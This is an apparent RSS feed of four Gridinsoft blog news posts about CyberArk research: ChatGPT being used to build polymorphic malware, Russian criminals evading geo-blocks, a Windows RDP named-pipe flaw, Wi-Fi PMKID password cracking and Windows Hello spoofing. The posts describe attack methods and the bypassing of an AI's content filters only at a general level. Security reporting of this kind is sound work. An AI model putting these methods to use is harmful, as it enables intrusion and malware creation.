CyberArk Archives – Gridinsoft Blog https://gridinsoft.com/blogs/tag/cyberark/ Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe. Thu, 19 Jan 2023 11:03:48 +0000 en-US hourly 1 https://wordpress.org/?v=96810 200474804 Russian Cybercriminals Seek Access to OpenAI ChatGPT https://gridinsoft.com/blogs/access-to-openai-chatgpt/ https://gridinsoft.com/blogs/access-to-openai-chatgpt/#respond Thu, 19 Jan 2023 11:03:48 +0000 https://gridinsoft.com/blogs/?p=13220 Check Point analysts have noticed that Russian-speaking hacker forums are actively discussing access to bypass geo-blocking, due to which the OpenAI ChatGPT language model is not available in Russia. We also wrote that Microsoft’s VALL-E AI Is Able to Imitate a Human Voice in a Three-Second Pattern, and also that Google Is Trying to Get… Continue reading Russian Cybercriminals Seek Access to OpenAI ChatGPT

The post Russian Cybercriminals Seek Access to OpenAI ChatGPT appeared first on Gridinsoft Blog.

]]>

Check Point analysts have noticed that Russian-speaking hacker forums are actively discussing access to bypass geo-blocking, due to which the OpenAI ChatGPT language model is not available in Russia.

We also wrote that Microsoft’s VALL-E AI Is Able to Imitate a Human Voice in a Three-Second Pattern, and also that Google Is Trying to Get Rid of the Engineer Who Suggested that AI Gained Consciousness.

It was also reported that UN calls for a moratorium on the use of AI that threatens human rights.

Let me remind you that the topic of creating malware using ChatGPT is already being closely studied by the information security community, and experiments conducted by specialists show that such a use of the tool is really possible.

For example, a recent report by CyberArk details how to create polymorphic malware using ChatGPT, and the researchers plan to soon publish part of their work “for educational purposes.”

access to OpenAI ChatGPT
Scheme interactions between ChatGPT and malware

In fact, CyberArk managed to bypass ChatGPT content filters and demonstrated how “with very little effort and investment on the part of an attacker, you can continuously query ChatGPT, each time receiving a unique, functional and verified piece of code.”

access to OpenAI ChatGPT
Basic DLL injection in explorer.exe where the code is not fully completed yet

This results in polymorphic malware that does not exhibit malicious behavior when stored on disk, as it receives code from ChatGPT and then executes it without leaving a trace in memory. In addition, we always have the opportunity to ask ChatGPT to change the code.said the experts.

In turn, Check Point researchers warn of the rapidly growing interest of hackers in ChatGPT, as it can help them scale malicious activity. This time, it turned out that Russian-speaking attackers are trying to bypass restrictions on access to the OpenAI API. Hack forums are already sharing tips on how to bypass IP blocking, solve the problem with bank cards and phone numbers, that is, everything that is needed to gain access to ChatGPT.

We believe that these hackers are most likely trying to implement and test ChatGPT in their daily criminal operations. Attackers are becoming more and more interested in ChatGPT because the artificial intelligence technology behind it can make a hacker more cost effective.specialists write.

To prove their words, the researchers provide several screenshots. On one of them, the criminal wants to get access to the OpenAI API and asks his “colleagues” for advice on how best to use a stolen bank card to verify an OpenAI account.

access to OpenAI ChatGPT

Other screenshots discuss geo-blocking bypass, as ChatGPT is not currently available in Russia, China, Afghanistan, Belarus, Venezuela, Iran, and Ukraine.

Artificial intelligence company OpenAI has restricted access to its products for Ukrainians so as not to violate global sanctions due to the annexation of ORDLO and Crimea in 2014.

This is stated in the text of Forbes with reference to a letter that the company sent to the Ministry of Digital Transformation.

Alex Bornyakov
Alex Bornyakov
Because of the sanctions, they have to block ORDLO/Crimea. They do not know how to distinguish them from clients from the rest of Ukraine. If there was a cheap classifier, we would have revised the policy.said Oleksandr Bornyakov, Deputy Minister of Digital Transformation of Ukraine.

access to OpenAI ChatGPT

The report also notes that many semi-legal online SMS services have already compiled guides on how to use them to register with ChatGPT.

access to OpenAI ChatGPT
access to OpenAI ChatGPT

The post Russian Cybercriminals Seek Access to OpenAI ChatGPT appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/access-to-openai-chatgpt/feed/ 0 13220
Microsoft Has Already Patched a Vulnerability in Windows RDP Twice https://gridinsoft.com/blogs/vulnerability-in-windows-rdp/ https://gridinsoft.com/blogs/vulnerability-in-windows-rdp/#respond Tue, 21 Jun 2022 13:08:25 +0000 https://gridinsoft.com/blogs/?p=8700 This week, CyberArk researchers shared technical information about a named pipe RDP (Remote Desktop Protocol) vulnerability in Windows, for which Microsoft had to release two patches. The RCE vulnerability CVE-2022-21893 was fixed on January 2022 Patch Tuesday, but the attack vector was not fixed. In April 2022, Microsoft already fixed the new bug CVE-2022-24533. Let… Continue reading Microsoft Has Already Patched a Vulnerability in Windows RDP Twice

The post Microsoft Has Already Patched a Vulnerability in Windows RDP Twice appeared first on Gridinsoft Blog.

]]>
This week, CyberArk researchers shared technical information about a named pipe RDP (Remote Desktop Protocol) vulnerability in Windows, for which Microsoft had to release two patches.

The RCE vulnerability CVE-2022-21893 was fixed on January 2022 Patch Tuesday, but the attack vector was not fixed. In April 2022, Microsoft already fixed the new bug CVE-2022-24533.

Let me remind you that we wrote that Sarwent malware opens RDP ports on infected machines, and also that Information Security Specialists Discovered a 0-day Vulnerability in Windows Search.

CVE-2022-21893 is a Windows Remote Desktop Services (RDS) vulnerability that could allow an unprivileged user via RDP to access the file system of connected users’ devices.

The original issue was caused by improper handling of named pipe permissions in Remote Desktop Services, which allowed non-admin users to take over RDP virtual channels in other connected sessions. The named pipe was created in such a way that it allowed every user on the system to create additional named pipe server instances with the same name.the researchers write.

The vulnerability allows an attacker to view and modify the contents of the clipboard, sent files, and smart card PINs. An attacker can impersonate a logged in user and gain access to the victim’s connected devices (USB devices, hard drives, etc.).

This can lead to sensitive data leakage, lateral movement and privilege escalation.CyberArk noted.

According to the researchers, the vulnerability exists due to improper handling of RDS named pipe permissions, which allows a user with normal privileges to “hijack RDP virtual channels in other connected sessions.”

A named pipe allowed each user on the system to create additional pipe servers with the same name.CyberArk explained.

Microsoft changed the permissions on pipes and prevented the regular user from creating named pipe servers. However, this did not remove the user’s ability to set permissions for subsequent instances. After the April fix, a new Globally Unique Identifier (GUID) is generated for new channels that prevents an attacker from predicting the name of the next channel.

At the moment, there are no vulnerabilities, and users are safe. Experts recommended updating the service to the latest version to ensure data protection.

The post Microsoft Has Already Patched a Vulnerability in Windows RDP Twice appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/vulnerability-in-windows-rdp/feed/ 0 8700
Expert hacked 70% of Wi-Fi networks in Tel Aviv for research https://gridinsoft.com/blogs/expert-hacked-wi-fi-networks-in-tel-aviv/ https://gridinsoft.com/blogs/expert-hacked-wi-fi-networks-in-tel-aviv/#respond Wed, 27 Oct 2021 16:08:43 +0000 https://blog.gridinsoft.com/?p=6070 CyberArk specialist Ido Hoorvitch hacked 70% of Wi-Fi networks in his native Tel Aviv, seeking to prove that home networks are poorly secured and easily compromised. To conduct the experiment, Horwich walked around town with sniffing equipment and collected data from 5,000 network hashes. Next, he exploited a vulnerability to obtain the PMKID hash normally… Continue reading Expert hacked 70% of Wi-Fi networks in Tel Aviv for research

The post Expert hacked 70% of Wi-Fi networks in Tel Aviv for research appeared first on Gridinsoft Blog.

]]>
CyberArk specialist Ido Hoorvitch hacked 70% of Wi-Fi networks in his native Tel Aviv, seeking to prove that home networks are poorly secured and easily compromised.

To conduct the experiment, Horwich walked around town with sniffing equipment and collected data from 5,000 network hashes. Next, he exploited a vulnerability to obtain the PMKID hash normally generated for roaming. The PMKID hash consists of the network SSID, passphrase, MAC address, and a static integer.

hacked Wi-Fi in Tel Aviv

To get the PMKID hashes, he used a $ 50 AWUS036ACH ALFA NIC, which could act as both a monitor and a packet injection tool, and then analyzed them using WireShark in Ubuntu.

hacked Wi-Fi in Tel Aviv

Using the method of Jens “atom” Steub (lead developer of Hashcat), Horwich collected PMKIDs, which were then cracked to obtain passwords.

The atom method is not client-driven, so there is no need to capture a user’s login in real time, nor is there a need to [wait] for users to connect to the network in general. Moreover, an attacker only needs to grab one frame and eliminate incorrect passwords and corrupted frames that interfere with the cracking process.Horwich says.

So Horwich started with mask attacks to identify people using their mobile phone number as a password for Wi-Fi (a common occurrence in Israel). To crack such passwords, it is necessary to calculate all variants of Israeli phone numbers, and these are ten digits, always starting with 05, which leaves only eight digits.

Using a regular laptop and this technique, the researcher successfully compromised 2,200 passwords at an average rate of nine minutes per password. In the next step, he switched to a dictionary attack using Rockyou.txt. This led to the rapid cracking of an additional 1,359 passwords, most of which used only lowercase characters.

hacked Wi-Fi in Tel Aviv

As a result, Horwich successfully compromised about 70% of the passwords for the selected Wi-Fi networks and confirmed all his guesses about the poor security of Wi-Fi networks.

The specialist summarizes that users should not enable the roaming function on routers intended for personal use (WPA2-personal), because there is no need for roaming in such networks. He also notes that passwords longer than 10 letters/numbers are more resistant to cracking.

Let me remind you that Any Wi-Fi enabled devices are vulnerable to Frag Attacks issues.

The post Expert hacked 70% of Wi-Fi networks in Tel Aviv for research appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/expert-hacked-wi-fi-networks-in-tel-aviv/feed/ 0 6070
Researchers trick Windows Hello with infrared image https://gridinsoft.com/blogs/researchers-trick-windows-hello-with-infrared-image/ https://gridinsoft.com/blogs/researchers-trick-windows-hello-with-infrared-image/#respond Mon, 19 Jul 2021 16:34:31 +0000 https://blog.gridinsoft.com/?p=5720 CyberArk researchers tricked the Windows Hello biometric authentication system that is included in all versions of Windows 10 using an infrared image of the device owner. Researcher Omer Tsarfati says the root of the problem lies in the way Windows Hello handles data from USB-connected webcams. While Windows Hello only works with webcams that have… Continue reading Researchers trick Windows Hello with infrared image

The post Researchers trick Windows Hello with infrared image appeared first on Gridinsoft Blog.

]]>

CyberArk researchers tricked the Windows Hello biometric authentication system that is included in all versions of Windows 10 using an infrared image of the device owner.

Researcher Omer Tsarfati says the root of the problem lies in the way Windows Hello handles data from USB-connected webcams. While Windows Hello only works with webcams that have an infrared sensor (in addition to regular RGB), it turns out that the system doesn’t need much RGB data. This means that with just one infrared facial image, you can unlock the victim’s device protected by Windows Hello biometrics.

While most users know that they can use a webcam for authentication and facial recognition on a Windows 10 machine, Zarfati found that Windows Hello only supports webcam input via infrared sources. And it turned out that the infrared input check is insufficient or comparable to the check for conventional (RGB) cameras.

As a result, an attacker can connect a malicious device that simulates a USB camera to the computer and then use it to transmit an infrared image of the owner’s face. While it is not possible to transmit a static Windows Hello image under normal circumstances, these restrictions do not work for infrared input, and the researcher successfully tricked the authentication process into gaining access to the locked machine.

A video demonstration of the attack can be seen here.

Researchers tricked Windows Hello

We created a complete map of the entire Windows Hello facial recognition process and saw that the most convenient way for an attacker to pretend to be a webcam, because the entire system relies on this input.says the expert.

To implement such an attack, physical access to the device would be required, however, Microsoft fixed this vulnerability, which received the identifier CVE-2021-34466, as part of the July “update Tuesday”.

Actually, Microsoft needs to be careful. We have known this method of attack for a long time. I am a little disappointed that they do not restrict which cameras can be trusted. concludes Tsarfati.

Let me remind you that I wrote that Cybersecurity expert created an exploit to hack iPhone via Wi-Fi and that Researchers made Tesla’s autopilot work without a driver.

The post Researchers trick Windows Hello with infrared image appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/researchers-trick-windows-hello-with-infrared-image/feed/ 0 5720